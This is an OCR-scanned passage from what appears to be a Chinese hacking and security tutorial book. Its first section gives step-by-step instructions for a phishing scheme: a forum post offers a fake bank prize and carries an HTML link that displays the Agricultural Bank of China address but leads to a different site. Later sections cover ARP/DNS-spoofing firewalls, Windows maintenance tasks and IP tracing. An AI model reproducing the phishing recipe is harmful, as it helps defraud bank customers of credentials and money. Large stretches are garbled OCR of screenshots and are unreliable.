到 URL， 其 作用 非常 强大 ， 但 也 可 以 利用 


URL 地 址 进行 欺骗 攻击 ， 即 攻击 者 利用 一 
定 的 攻击 技术 ， 构 造 虚假 的 URL 地 址 ， 当 
用 户 访问 该 地 址 的 网 页 时 ， 以 为 自己 访问 
的 是 真实 的 网 站 ， 从 而 把 自己 的 财务 信息 
泄露 出 去 ， 造 成 严重 的 经 济 损失 。 

在 使 用 该 方法 进行 诱骗 时 ， 黑 客 们 常 
常 是 通过 垃圾 邮件 或 在 各 种 论坛 网 页 中 发 
布 伪造 的 链接 地 址 ， 进 而 使 用 户 访问 虚假 
的 网 站 。 伪 造 虚假 的 URL 地 址 的 方法 有 多 
种 ， 如 起 个 具有 诱惑 性 的 网 站 名 称 、 使 用 
易 混 的 字母 数字 等 ， 但 最 常用 的 还 是 利用 
下 编码 或 正 漏洞 进行 伪造 URL 地 址 。 该 
方法 使 得 用 户 单 击 的 链接 与 真实 的 网 址 不 
符 ， 从 而 登录 到 黑客 伪造 的 网 站 中 。 

这 里 举 一 个 具体 的 实例 来 说 明 利 用 
URL 伪造 地 址 进行 网 上 银行 攻击 的 过 程 ， 
具体 的 操作 步骤 如 下 。 

[sep 回 在 任意 网 上 论坛 中 发 布 一 个 极 具 有 诱 
惑 性 的 帖子 ， 其 主题 为 “注册 网 上 银行 即 
可 中 1 万 元 大 奖 ! ”， 如 下 图 所 示 。 


ET 200 TF 


| 


| 
[TXT7TTTRETEZ IT 二 了 了 
和 | 惠 | 硫 交 易 胜任 末 册 守 | 


step 加 帖子 内 容 中 给 入 诱惑 性 的 信息 ， 并 留 
下 网 上 银行 的 链接 地 址 ， 这 个 地 址 的 作用 
是 诱导 用 户 登 录 到 黑客 伪造 的 网 站 中 ， 并 
使 用 户 误 认 为 自己 登录 的 网 站 地 址 是 正确 
的 ， 因 此 需要 在 帖子 中 加 入 如 下 代码 “点 
击 <a href-"http:/wwwbaidu.com'"> 中 国 农 
业 银 行 网 上 银行 </a>， 即 可 登录 或 注册 网 
上 银行 就 有 可 能 中 1 万 元 大 奖 ! ”， 如 下 图 
所 示 。 
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二 ef- bnpywww baidu cr 中国 农业 银行 辣 上 银行 <a>， 邵 可 登录 或 注册 网 上 混 
和 


EECTETIETTTICCETTICTTTD 


闪 表 《ECTRLtENTERI 攻 由 刺 先 


单 击 “发 表 ” 按 钮 或 在 纺 


step 图 输入 完毕 ， 


辑 框 内 按 Ctrl+Enter 组 合 键 发 表 帖 子 。 在 帖 
子 发 表 成 功 后 ， 即 可 在 网 页 中 显示 “中 国 
农业 银行 网 上 银行 ”的 信息 ， 如 下 图 所 示 。 


当 用 户 单 击 “ 中 国 农业 银行 网 上 银行 
链接 时 ， 打 开 的 却 是 黑客 伪造 的 网 站 ， 这 
里 是 百度 网 页 。 如 果 把 百度 的 网 址 换 成 黑 
客 伪 造 的 银行 网 站 ， 那 么 用 户 就 有 可 能 上 
当 受骗 


OO osoe 
wx sq bet 0 2 Me us a 
00 
O00 
Baidh 百度 
Es 


¢ > 


侈 提示 : 当然 ， 这 种 欺骗 方法 是 一 种 比较 
简单 的 方法 ， 稍 有 一 点 上 网 经 验 的 用 户 只 
需 将 光标 放置 在 链接 上 ， 即 可 在 下 方 的 状 
态 栏 中 看 到 实际 所 链接 到 的 网 址 ， 从 而 识 
破 该 欺骗 形式 。 

[Estee 图 为 了 进一步 伪装 URL 地 址 ， 还 需 
要 在 真实 的 网 上 银行 URL 地 址 中 加 入 相 
关 代 码 ， 如 把 上 述 帖 子 内 容 修 政 为 “点 
击 <a href="http:/www.baidu.com">http:// 
Www.95599.cn/ </a>， 即 可 登录 或 注册 网 上 
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Eee 图 发 帖 成 功 后 ， 在 网 页 中 将 显示 http:// 
www.95599.cn 的 链接 地 址 ， 即 使 光标 移动 
到 链接 地 址 上 ， 在 其 窗口 的 状态 栏 中 看 起 
来 依然 连接 到 http://www.95599.cn， 如 下 图 
所 示 。 但 是 到 单 击 该 链接 后 ， 才 发 现 打 开 
的 是 伪装 的 网 站 。 


总 之 ， 针 对 上 述 情况 ， 用 户 在 上 网 的 
过 程 中 ， 一 定 要 随时 注意 地 址 栏 中 URL 的 
变化 ,一 旦 发 现 地 址 栏 中 的 域名 发 生变 化 ， 
就 要 引起 高 度 的 重视 ， 从 而 避免 上 当 受 骗 。 


网 络 其 骗 攻 击 的 防护 技巧 


面 对 网 络 中 形形色色 的 网 络 欺骗 ， 计 
算 机 用 户 不 要 害怕 ， 下 面 介绍 几 种 防范 网 
络 其 骗 攻 击 的 方法 与 技巧 。 


绝招 13: 使 用 绿 盾 ARP 防 火 墙 防御 ARP 
攻击 


由 于 恶意 ARP 病毒 的 肆意 攻击 ，ARP 
攻击 泛滥 给 局 域 网 用 户 带 来 巨大 的 安全 隐 
患 和 不 便 。 网 络 可 能 会 时 断 时 通 ， 个 人 账 
号 信息 可 能 在 毫 不 知情 的 情况 下 就 被 攻击 
者 盗 取 。 绿 盾 ARP 防火 墙 能 够 双向 拦截 
ARP 欺骗 攻击 包 ， 监 测 锁定 攻击 源 ， 时 刻 
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保护 局 域 网 用 户 PC 的 正常 上 网 数据 流向 ， 
是 一 款 适 于 个 人 用 户 的 反 ARP 欺 骗 保护 工 具 。 
使 用 绿 盾 ARP 防火 墙 的 具体 操作 步骤 
如 下 。 
[ep 加 下 载 并 安装 绿 盾 ARP 防火 墙 ， 打 开 
其 主 窗 口 ， 在 “运行 状态 ”选项 卡 下 可 以 
看 到 攻击 来 源 主机 IP 及 MAC、 网 关 信息 、 
拦截 攻击 包 等 信息 ， 如 下 图 所 示 。 


[ET 本 


Se 
ee A A i 
Fan RE: 0 Eg ev 
站 和 tp8 #0008) 上 0 
A 
二 让。 
小 训 R 
Fi 
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在 “系统 设置 ”选项 卡 下 , 选择 “ARP 
保护 设置 ”选项 ， 可 以 对 绿 盾 ARP 防火 墙 
各 个 属性 进行 设置 ， 如 下 图 所 示 。 


ER E13 


i 国 宇 ann 类 场 入 护 

© PRER 和 日 动 职 和 Fuc 地 处 Rb 
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而 了 开设 司 由 给 CCP 3 身 1 

潜 扫 ES 全 轩 团 放 woah 大志 2h 护 

TEE 于 其 止 发 送信 法 天 避 地 iNee 扣 六 
ee ybxsgaipucnoapx 

em maoAiamhpais sete) 


WW rene 
二 Ra 但 寺 作 辐 要 要 中 让 


| NASA | 


[step 图 如 果 选 择 “手工 输入 网 关 MAC 地 址 ” 
单 选 按钮 ， 然 后 单 击 “ 手 工 输入 网 关 MAC 
地 址 ”按钮 ， 打 开 “ 网 关 MAC 地 址 输入 ” 
按钮 , 在 其 中 输入 网 关 耳 地址 与 MAC 地 址 ， 
如 下 图 所 示 。 


网 关 MAC 地 址 输入 x 
网 关 IP 地 址 : 192. 168.0.135 
网 和 BC 地 址 : DO-1E-6C-F0-65-7H| 
192. 168. 0 1-F4:83:CD:33:60:73 

EE 
取消 | 


人 @ 提 示 : 一 定 要 把 网 关 的 MAC 地 址 设置 
正确 ， 否 则 将 无 法 上 网 。 


step 园 单 击 “ 添 加 ”按钮 ， 即 可 完成 网 关 的 
添加 操作 ， 如 下 图 所 示 。 


网 关 MAGIB 直 纺 入 x 
网 关 Tp 地 址 : [3 
网 党 Br 地 址 。。。 丰 -E6- 和 -56 证 


192. 168. 0. 1-84.63.C0:33:60: 
192. 168.0 135-00-1E-8C-#D-65-7F 


取消 | 
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[step 国 ] 选择 “常规 设置 ”选项 ， 在 其 中 可 以 
对 常规 选项 进行 设置 ， 如 下 图 所 示 。 


OE 


TR rs 
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Ti 


[2 


侈 提示 : 根据 ARP 攻击 原理 ， 攻 击 者 就 是 
通过 伪造 他 x 地址 和 MAC 地 址 来 实现 ARP 
欺骗 的 ， 而 绿 盾 ARP 防火 墙 的 网 关 动态 探 
测 和 识别 功能 可 以 识别 伪造 的 网 关 地 址 
动态 获取 并 分 析 判 断后 为 运行 ARP 防火 墙 
的 计算 机 绑 定 正 确 的 网 关 地 址 ， 从 而 时 刻 
保证 本 机 上 网 数据 的 正确 流向 。 


[step 国 选择 “扫描 限制 设置 ”选项 ， 在 打开 
的 界面 中 可 以 对 扫描 各 个 参数 进行 限制 设 
置 ， 如 下 图 所 示 。 
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Eee 图 选择 “带宽 管理 设置 ”选项 ， 在 打开 
的 界面 中 可 以 启用 公 网 带宽 管理 功能 ， 在 
其 中 设置 上 传 或 下 载 带 宽 限制 值 ， 如 下 图 
所 示 。 


[sep 较 单 击 “ 设 置 界面 弹出 密码 ”按钮 ， 弹 
出 “密码 设置 ”对 话 框 ， 在 其 中 可 以 对 密 
码 进行 设置 ， 和 输入 完毕 后 ， 单 击 “ 确 定 ” 
按钮 即 可 完成 密码 的 设置 ， 如 下 图 所 示 。 


密码 设置 x 


提示 : 密码 字符 数 必 须 小 于 或 等 于 16 


| 
重复 新 密码 | | 
蕊 三 [| 3 ] 


在 ARP 攻击 盛行 的 当今 网 络 中 ， 绿 盾 
ARP 防火 墙 不 失 为 一 款 好 用 的 反 ARP 欺骗 
保护 工具 ， 使 用 该 工具 可 以 有 效 保护 自己 
的 系统 免 遭 欺骗 。 


绝招 14: 通过 AntiARP-DNS 防 御 DNS 
欺骗 


AntiARP-DNS 防火 墙 是 一 款 可 对 ARP 
和 DNS 欺骗 攻击 实时 监控 和 防御 的 防火 墙 。 
当 受 到 ARP 和 DNS 欺骗 攻击 时 ， 会 迅速 
记录 追踪 攻击 者 并 将 攻击 程度 控制 至 最 低 ， 
可 有 效 防止 局 域 网 内 的 非法 ARP 或 DNS 欺 
骗 攻 击 ， 还 能 解决 被 攻击 之 后 出 现 卫 冲突 
的 问题 ， 具 体 的 操作 步骤 如 下 。 


[sep 回 安装 AntiARP-DNS 防火 墙 ， 打 开 其 
主 窗口 ， 可 以 看 到 主 界面 中 显示 的 网 卡 数 
据 信 息 ， 包 括 子 网 掩 码 、 本 地 耳 以 及 局 域 
网 中 其 他 计算 机 等 信息 ， 如 下 图 所 示 。 当 
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启动 防护 程序 后 ， 该 软件 就 会 把 本 机 MAC 
地 址 与 瑟 地 址 自动 绑 定 ， 实 施 防护 。 


| 由 AntARP-DNS -再 RM 乐 版 (人 PC By Jialia QQ:32713957] 


ARP-DWS 最 对 防火 坊 -AntiARP-DRS Wer-3.9.0 [Www TaLv-netl 


辣 F 所 信息 | 最 机 本 关于 | 性 让 口 信 上 | 是 鸣 藏 凡 退 | 


Duetooth Devioe (cam rrotocol TDI) 
ET 


Bis 相 务 器 地 幅 : [501] 6l 128.154 163 
[ooe] S429 114.135 
时 名 255.0 0.0 

折 耳 ;0806 Tc 
医 亚 :1921952161 JE 


We: Type Statis 
We. Type Saris 


I 
at 局 
巴 信息 3% 单 青 要 丰 ”区 全 消 手 存 

口 强 制 访问 。 局 商 所 信息 | 多 三 舌 源 列 【 历史 记录 和; 大 本 诊 天 本 85 刘 的 玉 才 二 全 


辕 结果 末 发 现 可 以 制造 对 外 部 ARP 攻 击 的 可 短 进 得 


搞 相 :le9,247 9 发送 1 995,5tE 中 


AntARP DNS Ver3.9.0 By Je 


移 提 示 : 当 遇 到 ARP 网 络 攻击 后 ， 软 件 会 
自动 拦截 攻击 数据 ， 系 统 托盘 图 标 会 呈现 
闪烁 性 来 警示 用 户 。 另 外 ， 在 日志 里 也 将 
记录 当前 攻击 者 的 JP 和 Mac 攻击 者 的 信息 
和 攻击 来 源 。 


[Eee 国 单 去 “广播 源 列 ”按钮 ， 即 可 看 到 广 
播 来 源 的 相关 信息 ， 如 下 图 所 示 。 


风 AntiARP-DNS - 海 商 玉 乐 版 (个 人 PC) [Ey Jiajia QQ82713957] 


ARP-DWS 钦 坊 防 兴 仿 - AntiARP-DNS Yer 3.9.0 [Ww Tolv.net] 


广播 来 押 列 局 加 关于 | 户 记 3 口 访 上 | 业 唤 闻 如 退出 | 
Cn Cs 0 3 FE 3] 


1 记录 共 : 0 条 | 礼 NT 媒 丰 表 补 :0 六 | [ET 
口 强制 该 引 。 革 孝 所 信息 ”学 广 氛 源 列 [ 旋 历史 记录 ”二 基本 座 关 3 本 二 汉 加 本 地 安 全 
图 状态 空间 


[step 图 单 去 “历史 记录 ”按钮 ， 即 可 看 到 受 
到 ARP 攻击 的 详细 记录 。 另 外 ， 在 下 面 的 
JP 地 址 文本 框 中 输入 了 PP 机 制 之 后 , 单 击 “ 查 
询 ” 按 钮 ， 即 可 查 出 其 对 应 的 Mac 地 址 ， 
如 下 图 所 示 。 


AntARp DIS Ver3.90 EyJola 
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大 AnEARP-DNS -光志 光世 志 版 (个 人 PO) [By jiajia QC:E2713957] 


| 忆 着 W 加 关于 | 户 启 口语 L | 是 只 六 昌 巡 出 | 


还 WE 


Ey 
户 到 和 中 扩展 
口交 。 辐 雪 扫 信息 户 广 播 基 虽 | 历 只 记录 请 基 本 设置 [5 本 地 了 W 邵 全 本 地 全 


畦 术 二 用 AntiARP-DNS Ver3.90 By Jala 


[step 园 单 去 “基本 设置 ”按钮 ， 即 可 看 到 相 
关 的 设置 信息 ， 在 其 中 可 以 设置 各 个 选项 
的 属性 ， 如 下 图 所 示 。 


[a 


mr: 


起 AntdiARP-DNS - 海 卫 玉 乐 版 (个 人 PC) [Ey Jiajia QQ82713957] 


ET 轩 关 于 | [> 启动 口 售 上 | 业 隐 本 轧 巡 出 | 


* 主 功能 
了 固 自 害 F 关 (风光 浇 ) 。 〇 自 药 定 (只 上 网 ) Ea 设 
~ Tie ee er ET 
口 先生 E 抱 动 忆 战 技 。。 首 通 党 控 拓 术 等 级 。 国 蓝 ” 〇 中 口 强 
口 运 行 后 和 动 强 创 访问 。 强制 廊 同 本 者 等 织 。 口音 图 中 口 强 


拍 癌 基 上 系 线 人 冲 完 提 不 癌 知 衣 此 近 蝴 八 分， 加 自 寺 等 织 。 〇 失地 如 执 


国 遭 要 于 出 后 提 未， 〇 气相 通 知 “加 @ 图 本 站 大 


目 二 3 行 ( 朋 郑 。。 癌 话 行 后 各 小 化 惠 栏 
口 运 行 后 自动 着 证 95 。 问 实 时 内 woWcrv 词 电 


| 如 保 看 设 辕 | 
三 强制 沪 引 。 记者 失 信息 ”多 三 指 沽 列 [ 沪 历 史记 录 | 多 基本 论 秆 | [4 本 地 护 宰 侈 泵 地 安全 
畦 术 态 空间 


AntARP-DNS Ver3.90 By Ia 


侈 提示 : AntiARP-DNS 提供 了 比较 丰富 
的 设置 菜单 ， 如 主要 功能 、 副 功能 等 。 除 
可 用 预防 掉 线 断 网 情况 外 ， 还 可 以 识别 由 
ARP 欺骗 造成 的 “系统 了 PP 冲突” 情况 ,而 
且 还 增加 了 自动 监控 模式 。 


单 击 “ 本 地 防御 ”按钮 , 即 可 切换 到 “本 
地 防御 欺骗 ”选项 卡 ， 在 其 中 根据 DNS 绑 
定 功能 可 屏蔽 不 良 网 站 ， 如 在 用 户 所 在 的 
网 站 被 ARP 挂 马 等 ， 可 以 找 出 页 面 进行 屏 
蔽 ， 如 下 图 所 示 。 其 格式 是 127.0.0.1 www. 
XXX.com， 同 时 该 网 站 还 提供 了 大 量 的 恶意 
网 站 域名 ， 用 户 可 根据 情况 进行 设置 。 
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| 办 AndARP-DNS - 海 丙 和 所 本 (个 人 PC) [By Jiaja QQ52713957] 


本 运行 x 


PE Windows 检 根 括 你 所 输入 的 名 称 ,为 你 打开 杠 应 的 程序 、 
文件 夫 、 文 栏 或 Internet 资源 


打开 (O): |cmd| v 


Ce | [a 


单 击 “ 确 定 ?按钮 , 打开 “命令 提示 符 ” 
窗口 ， 如 下 图 所 示 。 


二 R 


口 ms WE 


[rs 查 添 至 去 台 行 
口 强 制 沪 交 。” 世 | 数据 信息 地 广播 源 列 [ 少 历史 记录 全 基本 设置 |- 林地 防 部 | 各 本 地 守 全 国 管理 员 : C\windows\system32\cmd.exe = 口 X 
图 六 AntARP DNS Ver390 ByJels icrosoft Windows [版 本 10. 0. 16299, 936] ~ 

畏 (c) 2017 MGicrosoft Corporation。 保留 所 有 权利 。 


[step 较 单 击 “ 本 地 安全 ”按钮 , 即 可 切换 到 “本 :\sers\Adninistrator>. 
地 安全 防范 ”选项 卡 ， 在 其 中 可 以 扫描 本 
地 计算 机 中 存在 的 危险 进程 ， 如 下 图 所 示 。 


大 AndiARP-DNS - 海 二 砍 乐 节 懂 (个 人 PC) [By Jajia Qcz82713957] 一 x 


牙 台 防火 声 一 


电 加 关于 | 己 庆 由 口误 上 | 业 隐 生 加 开业 | v 


a | ”| [es 国 在 “命令 提示 符 ” 窗 口中 输入 amp -a 
Be 命令 ， 按 Enter 键 ， 即 可 显示 出 本 机 系统 
som ARP 缓存 表 中 的 内 容 ， 如 下 图 所 示 。 


司空 主 寺 页 


而 管理 员 : C\windows\system32\cmd.exe - DO x 


icrosoft Windows [版 本 10. 0. 16299. 936] 和 
(c) 2017 Microsoft Corporation。 保 留 所 有 权利 。 


:NUsers\VAdministrator>arp -a 
口 : 192. 168.0. 135 --- 0x2 


性 计生 


Internet 址 
局 者 捐 信 息 沁 广 氮 淹 列 [ 沪 历史 记录 多 基本 设 资 [Cy 本 5 前 全 三 好 安全 192. 168.0. 1 £4-83-cd-33-60-73 
sl < 2 和 中 一 192. 168. 0. 105 7c-76: 5 
ji 杀 Anpappsvero0 ByJoy | 192. 168. 0. 115 b4-cd -ba 


192. 168. 0. 116 84-be-52-3b-17-01 
192. 168. 0, 117 58-fb-84-fb-58-10 
192. 168. 0. 122 00-23-24-d9-b6-e5 

-ff ff 


6.6 ”实战 演练 
实战 演练 1 一 “查看 系统 中 的 ARP 缓 存 表 
在 利用 网 络 欺骗 攻击 的 过 程 中 ， 经 常 


224. 0. 0. 253 01-00-5e-00-00-fd 
239. 255. 255. 250 01-00-5e-7f-ff-fa 


在 “命令 提示 符 ” 窗 口中 输入 arp -d 


命令 ， 按 Enter 键 ， 即 可 删除 ARP 表 中 所 
用 到 的 一 种 次 驴 方 式 是 ARP 激 驴 ， 但 在 实 有 的 内 容 ， 如 下 图 所 示 。 
施 ARP 欺骗 之 前 ， 需 要 查看 ARP 缓存 表 。 
那么 如 何 查看 系统 的 ARP 缓存 表 信息 呢 ? 而 管理 员 : C\windows\system32\cmd.exe 并 X 
具体 的 操作 步 强 如 下 。 0 
[step 图 右 去 “开始 ”按钮 ， 在 弹出 的 快捷 菜 
单 中 选择 “运行 ”菜单 命令 ， 打 开 “ 运 行 ” 
对 话 框 ， 在 “打开 ”文本 框 中 输入 cmd， 
如 下 图 所 示 。 


Sy 


因 实战 演练 2 一 一 在 “网 络 邻居 ”中 隐藏 自己 
i 如 果 不 想 让 别人 在 “网 络 邻 居 ” 中 看 到 

自己 的 计算 机 ， 则 可 把 自己 的 计算 机 名 称 在 
网 络 邻 居 里 隐藏 ， 具 体 的 操作 步骤 如 下 。 
[step 图 右 去 “开始 ”按钮 ， 在 弹出 的 快捷 
菜单 中 选择 “运行 ”菜单 命令 ， 打 开 “ 运 
行 ” 对 话 框 ， 在 “打开 ”文本 框 中 输入 
Tegedit， 如 下 图 所 示 。 


杏 运行 x 


FE/| Windows 梅 根据 你 所 编 入 的 名 称 ， 为 你 打开 框 应 的 程序 、 
文件 突 . 文档 或 Internet 资源 . 


打开 (O): |regedi 
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[step 回 选中 Hidden 子 键 并 右 击 ， 在 弹出 的 
快捷 菜单 中 选择 “修改 ”菜单 命令 , 打开 “ 编 
辑 字 符 串 ”对 话 框 ， 如 下 图 所 示 。 


[Eee 图 在 “数值 数据 ”文本 框 中 将 数值 数据 
设置 为 1， 如 下 图 所 示 。 


浏览 (B)… 


Ew 


EGG 图 单 去 “确定 ”按钮 ， 打 开 “ 注 册 表 纺 
辑 器 ”窗口 ， 如 下 图 所 示 。 


国 注册 表 纺 坟 吕 - 0O x 
文件 (有 ”六 吉 (E) 前 看 (V) 收藏 (A) 帮 吉 (H) 
> 于 计算 机 a sm 


a hkEv_cuAsses ROOT 
a HKEY_CURRENT_USER 
半 HKEY_LOCAL MACHINE 
闻 HKEY UsERS 

忆 hkey cuRRENT coNPlG 


< > 


计算 机 


在 “注册 表 编 辑 器 ”窗口 中 ， 展 开 
分 支 到 HKEY LOCAL MACHINE\System\ 
CurrentControlSet\Services\LanManServer\ 
Parameters 子 键 下 ， 如 下 图 所 示 。 


图 注册 专 操 所 只 


[Eee 图 单 击 “确定 ”按钮 ， 就 可 以 在 “网 络 
邻居 ”中 隐藏 自己 的 计算 机 ， 如 下 图 所 示 。 
= 了 二 加 
+ ~ + 大 本 云 示 5 
芽 快要 访 同 
v 国 此 电车 


Dv itm) 
| ee 
MY] -scoroserss 
网 次 褒 施 (1) 


i> widess N Reuter TL-WREB6N 


小 试 身手 

练习 1: 禁用 计算 机 的 开机 启动 项 
在 计算 机 启动 的 过 程 中 ， 自 动 运行 的 强 

程序 叫 作 开机 启动 项 。 开 机 启动 程序 会 浪 

费 大 量 的 内 存 空间 ， 并 减 慢 系统 启动 速度 ， 

因此 ， 要 想 加 快 开关 机 速度 ， 就 必须 禁用 

一 部 分 开机 启动 项 ， 具 体 的 操作 步 又 如 下 。 


step 回 按 Ctrl+Alt+Delete 组 合 键 ， 打 开 “ 任 
务 管理 器 ”界面 ， 如 下 图 所 示 。 


step 较 单 去 “任务 管理 器 ”选项 ， 打 开 “ 任 
务 管理 器 ”窗口 ， 如 下 图 所 示 。 


向 (博导 台 - 0O x 
六 HI 这 项 坦 在 V) 
| 本 从 库 H 历 RD 受 司 双 月 户主 信息 服务 
11% S58% 0% 0% 
2 oy 内 
应 用 (外 
3600s 
图 Microsc Werd 
Vindeve 交管 理 日 ) 
向 fE 革 本 
后 台 进程 (41) 
6 3505 人 0s 
后 360 实 全 久光 吕 
6 3502 人 ms 
个 3560 全 Ri 中 
后 360 安 全 Wi 中 


) 简 妇 信息 (D) 


[ep 图 选择 “启动 ”选项 卡 ， 在 其 中 可 以 看 
到 系统 中 的 开机 启动 项 列表 ， 如 下 图 所 示 。 


则 的 = 
文体 (站 远大 (0) 下 看 W) 
过 但 性 前 “应 用 历史 记录 启动 月 户 洋 绍 信息 服务 
名 称 让 发 古书 状态 局 蚁 朋 
国 360 窑 全 了 十 安全 防 护 中 心 。 360.cn Be 六 
丁 bndicator Brother indusries Lid 已 用 
团 cTF 0B 闻 Micrcsoft Corporaton 。 已 启用 任 
三 Microsof OneDrive Miercsaft Corporaton 。 已 后 用 高 
加 satus Monitor Application Brother ndusries Ltd 已 用 让 
< > 
© M0) CS 


step 贺 选择 开机 启动 项 列表 框 中 需要 禁用 的 
启动 项 ， 单 击 “ 禁 用 ”按钮 ， 即 可 禁用 该 
启动 项 ， 如 下 图 所 示 。 
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ET - oOo x 
文件 月” 计 砚 O) 吉大 
法 性 长 六 应 用 历史 记录 启动 用户 ”洋红 信息 服务 


Ba 年 基本 sda) 
| > ® 360RS P+ El. 360cn ER 有 
BBrindcator Brother Industies, Ld 已 启用 中 
团 crr mF Micrcsoft Corporation 已 启用 低 
@ Microsoft OneDrive Micrcsof Corporation 。 已 要 用 高 
Ststus Monitor Applcation Brother ndusties ld， 已 启用 国 


篇 咯 信息 (D) 启用 (N) 


练习 2: 清理 系统 盘 中 的 垃圾 文件 


在 没有 安装 专业 的 清理 垃圾 的 软件 前 , 器 


用 户 可 以 手动 清理 磁盘 垃圾 临时 文件 ， 为 
系统 盘 瘦 身 ， 具 体 的 操作 步骤 如 下 。 

选择 “开始 ”一 所 有 应 用 ”一 “Window 
系统 ”一 “运行 ”菜单 命令 ， 在 “打开 ” 
文本 框 中 输入 cleanmgr， 如 下 图 所 示 。 


可 运行 x 


FE] Windows 梅 根据 你 所 给 入 的 名 称 ， 为 你 打开 想 应 的 程序 、 
文件 实 、 文档 或 Internet 资源 . 


打开 (0); |deanmg 咱 v 


弹出 “磁盘 清理 : 驱动 器 选择 ”对 话 框 ， 
单 击 “ 了 驱动 器 ”下 面 的 下 拉 按 钮 ， 在 弹出 
的 下 拉 菜 单 中 选择 需要 清理 临时 文件 的 磁 
盘 分 区 ， 如 下 图 所 示 。 


磁盘 清理 : 驱动 器 选择 X 


浏览 (B)… 


选择 要 清理 的 驱动 句 . 
驱动 器 (D): 
所 Windows10 (Cj ~ 


step 图 单 击 “ 确 定 ” 按 钮 ， 弹 出 “磁盘 清理 ” 
对 话 框 ， 并 开始 自动 计算 清理 磁盘 垃圾 ， 
如 下 图 所 示 。 


退出 00 
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磁盘 清理 x 


"Wy “磁盘 清理 "正在 计算 可 以 在 Windows10(C) 上 释放 多 少 空 
“~ 间 。 这 可 能 雪 要 几 分 钟 时 间 .。 


正在 计算 . 


正在 扫 拱 :系统 错误 内 存 转 储 文件 


[step 园 弹出 “Windows10(C:) 的 磁盘 清理 ” 
对 话 框 ， 在 “要 删除 的 文件 ”列表 中 显示 
扫描 出 的 垃圾 文件 和 其 大 小 ， 选 择 需 要 清 
理 的 临时 文件 ， 单 击 “ 清 理 系统 文件 ”按钮 ， 


如 下 图 所 示 。 
Ee x 
[ 
Re ee em Windovclo IC) 上 9 269 MB 十 
as 加 
ca 
252 Me 
754KB 
ora v 
257 Me 
RH 
HOLE? 
Ed Ew 
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step 园 系统 开始 自动 清理 磁盘 中 的 垃圾 文 
件 ， 并 显示 清理 的 进度 ， 如 下 图 所 示 。 


硬盘 清理 X 


“By “ 恕 盘 清 理 正 在 计算 可 以 在 Windows10(CJ] 上 释放 多 少 空 
~ 间 。 这 可 能 乞 要 几 分 钟 时 间 。 


正在 计算 .… 


mm | | 


正在 扫 拱 : 。 更 新 程序 包 备份 文件 


第 7 竟 


黑客 信息 的 追踪 与 代理 


服务 前 的 应 用 


黑客 为 了 更 好 地 隐藏 自己 ， 在 攻击 前 往往 会 先 找 到 一 些 疏 于 管理 或 管理 员 水 平 不 高 的 
网 络 主机 〈 即 所 谓 的 “肉鸡 ”) 作为 代理 服务 器 ， 通 过 这 些 主机 再 去 攻击 目标 系统 。 有 了 
这 些 代理 服务 器 ， 黑 客 的 行踪 就 不 易 被 追踪 者 所 查 到 ， 就 可 以 在 目标 主机 中 为 所 欲 为 了 。 


本 章 介绍 黑客 信息 的 追踪 与 网 络 代理 服务 器 的 应 用 。 
7.1 黑客 信息 的 追踪 [Step 图 如 果 要 查找 已 知 的 IP 地 址 ， 直 接 在 


随 着 网 络 应 用 技术 的 发 展 ， 如 何 保护 
网 络 生活 的 隐私 越 来 越 引起 了 人 们 的 重视 ， 
有 什么 办 法 可 以 使 用 户 躲 避 多 变 的 网 络 追 
踪 和 攻击 呢 ? 实际 上 ， 使 用 好 代理 工具 ， 
实现 通过 跳板 访问 网 络 ， 就 可 以 轻松 实现 
这 一 目标 。 


温 绝招 1: 使 用 网 站 定位 |P 物 理 地 址 


在 网 络 管理 中 ， 常 常 需要 精确 定位 某 
个 全 地 址 的 所 在 地 ， 实 际 上 ， 使 用 一 些 简 
单 命令 和 方法 即 可 完成 他 地 址 的 定位 。 下 
面 介绍 使 用 网 站 定位 卫 物理 地 址 的 方法 
有 具体 的 操作 步骤 如 下 。 

[stes 图 打开 一 个 IP 地址 查询 网 站 ， 这 里 打 
开 http://www.ip.cn 网 站 ， 如 下 图 所 示 。 


- OO 过 
@ 加: 国 rtps/ww 国 -80|| 要 于 P- 

国 ,pcn -IP 地 址 查 光 | 地 理 . 
请 四 desktop 


@ra | 


[ psa | 手机 、 电 话 号 码 数据 库 ”DNS “IP 列表 
| Ey 


您 现在 的 IP: 222.88.245-114 


所 在 地 理 位 置 : 新 疆 自治 区 伊犁 州 电信 


GeolP-: Kuitun, Xinjiang. China v 


IP 地 址 文本 框 中 输入 要 查找 的 了 PP 地 址 ， 如 
下 图 所 示 。 


@ Ei 


国 220181.57216 - IPen -1 


帘 目 desktop 
- 
司 iP.CN 


手机 、 电 话 号 码 数 据 库 。 DNS 。 IP 列表 


-Ey 


-ac 搜索 Lhd 


220.181.58 220 


您 查询 的 IP: 228.181.57.216 
所 在 地 理 位 置 : 北京 市 电信 
GeolP: Belling, China v 


[step 图 单 去 “查询 ”按钮 ， 即 可 得 到 查询 JP 
地 址 的 物理 位 置信 息 ， 如 下 图 所 示 。 


@ [ 回 - 国 nes 


国 220.181.58220- IPen -1 
言 目 desktop 


- 0O x 
轩 -有 C 搜索 .. pp- 
昌 


。 


您 查询 的 IP: 229.181.58.229 
所 在 地 理 位 置 : 北京 市 电信 
GeolP: Beijing, China 


China Telecom Beijing 
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2 四 绝招 2: 使 用 网 络 追踪 器 追踪 信息 


NeoTrace Pro v3.25( 网络 追踪 器 ) 是 
一 款 相 当 受 欢迎 的 网 络 路 由 追踪 软件 ， 用 
户 可 以 只 输入 远程 计算 机 的 E-mail、 亿 位 置 、 
超 链接 URL 等 ， 其 软件 本 身 会 自动 帮助 用 
户 显示 介 于 本 机 计算 机 与 远 端 机 器 之 间 的 
所 有 节点 与 相关 的 登记 信息 。 


1. 安装 NeoTrace Pro v3. 25 


先 下 载 并 解压 缩 NeoTrace Pro v3.25 

(网 络 追 踪 器 ) 文件 夹 。 双 击 NeoTrace Pro 
V3.25 应 用 程序 图 标 , 即 可 打开 “Welcome( 欢 
迎 )” 安 装 向 导 对 话 框 ， 如 下 图 所 示 。 


welcome x 
日 


\m] Welcome to NeoTiace Pro 325 Tiial Setup 
EE rogram This program wilinstal NeoTrace Pro 
S325 Tial onyou compuler 


Ni hongly tooommnoried th you owt ol Wndow progiome 
re running this Setup Program 


Click Cancel to quit Setup and close any programs you have 
unning Cick Nest to continue wih the Setup program 


WARNING; This program is protected by copyight law and 
intemational teaties 


Unauthorized ieproduction or distrbution of this piogram of any 
Potion of i, may resulk in severe Civil and criminal penalties, 
nd wllbe prosecuted to the meanum eyen possblo under 


CH cance 
单 击 Next 按钮 ， 即 可 打开 “License 
Agreement (许可 协议 )” 对 话 框 ， 在 其 中 
